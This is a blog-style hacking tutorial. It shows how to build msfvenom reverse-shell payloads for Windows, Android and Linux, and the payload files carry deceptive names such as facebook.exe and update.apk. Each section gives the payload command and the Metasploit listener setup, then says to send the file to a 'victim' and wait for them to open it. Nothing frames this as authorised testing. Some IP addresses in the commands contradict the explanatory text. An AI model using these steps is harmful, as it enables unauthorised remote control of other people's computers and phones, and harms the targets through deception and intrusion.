Hack Remote Windows, Linux PC and Android Phone using Msfvenom

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework 

The advantages of msfvenom are:
·         One single tool
·         Standardized command line options
·         Increased speed

Options available in msfvenom


Hack with Meterpreter Payload

Open your kali linux terminal and type

Msfvenom –p windows/meterpreter/reverse_tcp lhost=92.168.1.33 lport=445 –f exe > /root/Desktop/facebook.exe


-p for payload
Windows/meterpreter/reverse_tcp
Lhost (IP address of kali linux)
192.168.1.33
Lport (port of your local pc)
445
F (File Format)
Facebook.exe

Now we successfully generate the malicious exe File, it will stored on your local computer

/root/Desktop/facebook.exe

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.33
set lport 445
exploit

Now send your facebook.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Hack with Simple Shell Payload

Open your kali linux terminal and type

Msfvenom –p windows/shell/reverse_tcp lhost=92.168.1.33 lport=445 –f exe > /root/Desktop/raj.exe


Now we successfully generate the malicious exe File, it will stored on your local computer

/root/Desktop/raj.exe

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost 192.168.1.33
set lport 445
exploit

Now send your raj.exe files to victim, as soon as they download and open it. Now you can directly access the victim shell


Hack with powershell Payload

Open your kali linux terminal and type

Msfvenom –p cmd/windows/reverse_powershell lhost=92.168.1.33 lport=445  > /root/Desktop/file.bat


Now we successfully generate the malicious bat File, it will stored on your local computer

/root/Desktop/file.bat

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload cmd/windows/reverse_powershell
set lhost 192.168.1.33
set lport 445
exploit

Now send your file.bat files to victim, as soon as they download and open it. Now you can get the access of victim pc.


Hack Android Phone

Open your kali linux terminal and type

Msfvenom –p android/meterpreter/reverse_tcp lhost=92.168.1.33 lport=445 > /root/Desktop/update.apk


Now we successfully generate the malicious apk File, it will stored on your local computer

/root/Desktop/update.apk

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.33
set lport 445
exploit

Now send your update.apk files to victim mobile, as soon as they download and open it. Now you can get the access of victim android mobile.




Hack Linux PC
Open your kali linux terminal and type

Msfvenom –p python/meterpreter/reverse_tcp lhost=92.168.1.33 lport=445 > /root/Desktop/update.py


0 comments:

Post a Comment